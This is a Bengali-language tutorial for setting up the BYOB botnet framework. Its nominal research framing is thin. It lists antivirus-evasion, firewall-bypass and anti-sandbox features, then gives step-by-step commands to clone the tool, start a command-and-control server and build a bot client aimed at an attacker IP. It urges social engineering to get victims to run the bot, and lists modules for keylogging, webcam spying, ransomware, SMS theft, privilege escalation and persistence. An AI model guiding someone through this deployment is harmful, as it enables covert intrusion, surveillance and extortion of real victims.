আপনার নিজের বটনেট তৈরি করুন

BYOB নিরাপত্তা গবেষক এবং ডেভেলপারদের জন্য একটি কাঠামো প্রদান করে একটি মৌলিক বোটনেট তৈরি এবং পরিচালনা করার জন্য যাতে তারা অত্যাধুনিক ম্যালওয়্যার সম্পর্কে তাদের বোঝাপড়াকে আরও গভীর করে যা প্রতি বছর লক্ষ লক্ষ ডিভাইসকে সংক্রমিত করে এবং আধুনিক বটনেট তৈরি করে, যাতে এই হুমকিগুলির বিরুদ্ধে প্রতিরোধ ব্যবস্থা গড়ে তোলার ক্ষমতা উন্নত করা যায়। এটি এমনভাবে ডিজাইন করা হয়েছে যাতে ডেভেলপাররা সহজেই তাদের নিজস্ব কোড বাস্তবায়ন করতে পারে এবং স্ক্র্যাচ থেকে একটি RAT বা কমান্ড ও কন্ট্রোল সার্ভার না লিখেই দুর্দান্ত নতুন বৈশিষ্ট্য যোগ করতে পারে৷

বৈশিষ্ট্যসমূহ

• ডিস্কে কিছুই লেখা নেই − ক্লায়েন্টরা কখনই ডিস্কে কিছু লেখে না - এমনকি অস্থায়ী ফাইলও নয় কারণ রিমোট ইম্পোর্ট ইচ্ছামত কোডকে গতিশীলভাবে মেমরিতে লোড করতে দেয় এবং বর্তমানে চলমান প্রক্রিয়ায় সরাসরি আমদানি করতে দেয়৷

• প্ল্যাটফর্ম স্বাধীন − সবকিছু পাইথনে লেখা আছে এবং উৎপন্ন ক্লায়েন্টগুলি ঐচ্ছিকভাবে একটি পোর্টেবল এক্সিকিউটেবল (উইন্ডোজ) এ কম্পাইল করা যেতে পারে বা একটি স্বতন্ত্র অ্যাপ্লিকেশনে বান্ডিল করা যেতে পারে৷

• ফায়ারওয়ালগুলিকে বাইপাস করুন৷ − ক্লায়েন্টরা বিপরীত TCP সংযোগের মাধ্যমে কমান্ড এবং নিয়ন্ত্রণ সার্ভারের সাথে সংযোগ করে, যা বেশিরভাগ ফায়ারওয়ালকে বাইপাস করবে কারণ ডিফল্ট ফিল্টার কনফিগারেশন প্রাথমিকভাবে আগত সংযোগগুলিকে ব্লক করে।

• অ্যান্টিভাইরাসের বিরুদ্ধে পাল্টা-পরিমাপ − পরিচিত অ্যান্টিভাইরাস প্রোডাক্টের নাম সহ প্রসেস ব্লক করে অ্যান্টিভাইরাস দ্বারা বিশ্লেষণ করা এড়িয়ে যায়।

• বিশ্লেষণ প্রতিরোধ করতে পেলোড এনক্রিপ্ট করুন − প্রধান ক্লায়েন্ট পেলোড একটি র্যান্ডম 256-বিট কী দিয়ে এনক্রিপ্ট করা হয় যা শুধুমাত্র পেলোড স্টেজারে বিদ্যমান থাকে যা এটির সাথে তৈরি হয়।

• রিভার্স-ইঞ্জিনিয়ারিং প্রতিরোধ করুন − ডিফল্টরূপে, কোনো ভার্চুয়াল মেশিন বা স্যান্ডবক্স শনাক্ত হলে ক্লায়েন্টরা এক্সিকিউশন বাতিল করবে।

কিভাবে ইনস্টল করবেন

• git ক্লোন https://github.com/malwaredllc/byob.git

• cd byob

• pip install -r requirements.txt

• python setup.py

  এখানে দুটি টার্মিনাল ব্যবহার করা হবে; প্রথম টার্মিনাল হবে বট সার্ভার যেখানে সেশন পরিচালনা করা হবে এবং দ্বিতীয় টার্মিনাল বট ক্লায়েন্ট যেখানে বট তৈরি করা হবে।

• python server.py –port 445

  তারপরে অন্য একটি লিনাক্স টার্মিনাল খুলুন এবং টাইপ করুন cd /home/cybersecurity/Downloads/byob/byob

• python client.py –name testbot.py 192.168.1.10(আক্রমণকারী ip) 445

উপরের ক্যোয়ারীটি কার্যকর করার পরে, একটি নতুন বটনেট তৈরি করা হবে। উপরের প্রশ্নটি কার্যকর হবে। এখন, আপনি তাদের কম্পিউটারে বট খুলতে যেকোন সামাজিক প্রকৌশল কৌশল ব্যবহার করতে পারেন। testbot.py টার্গেট মেশিনে এক্সিকিউট হলে, বটনেট সার্ভারে একটি সেশন তৈরি করা হবে।

শোষণের পরে

শোষণ-পরবর্তী মডিউলগুলি ক্লায়েন্টদের দ্বারা ভিকটিমদের মধ্যে বটনেটের সফল কনফিগারেশনের পরে দূর থেকে আমদানি করা যায়৷

• কীলগার (byob.modules.keylogger):ব্যবহারকারীর কীস্ট্রোক এবং প্রবেশ করা উইন্ডোর নাম লগ করে

• স্ক্রিনশট (byob.modules.screenshot):বর্তমান ব্যবহারকারীর ডেস্কটপের একটি স্ক্রিনশট নিন

• ওয়েবক্যাম (byob.modules.webcam):একটি লাইভ স্ট্রিম দেখুন বা ওয়েবক্যাম থেকে ছবি/ভিডিও ক্যাপচার করুন

• মুক্তিপণ (byob.modules.ransom):ফাইল এনক্রিপ্ট করুন এবং মুক্তিপণ প্রদানের জন্য এলোমেলো BTC ওয়ালেট তৈরি করুন

• প্যাকেট স্নিফার (byob.modules.packetsniffer):হোস্ট নেটওয়ার্ক এবং upload.pcap ফাইলে একটি প্যাকেট স্নিফার চালান

• অধ্যবসায় (byob.modules.persistence):হোস্ট মেশিনে অধ্যবসায় স্থাপন করুন

• ফোন (byob.modules.phone):ক্লায়েন্ট স্মার্টফোন থেকে পাঠ্য বার্তা পড়ুন/অনুসন্ধান/আপলোড করুন

• এস্কেলেট প্রিভিলেজ (byob.modules.escalate):অননুমোদিত অ্যাডমিনিস্ট্রেটর সুবিধা পেতে UAC বাইপাস করার চেষ্টা করুন

• পোর্ট স্ক্যানার (byob.modules.portscanner):অন্যান্য অনলাইন ডিভাইসের জন্য স্থানীয় নেটওয়ার্ক স্ক্যান করুন এবং পোর্ট খুলুন

• প্রক্রিয়া নিয়ন্ত্রণ (byob.modules.process):list/search/kill/monitor বর্তমানে হোস্টে চলমান প্রক্রিয়াগুলি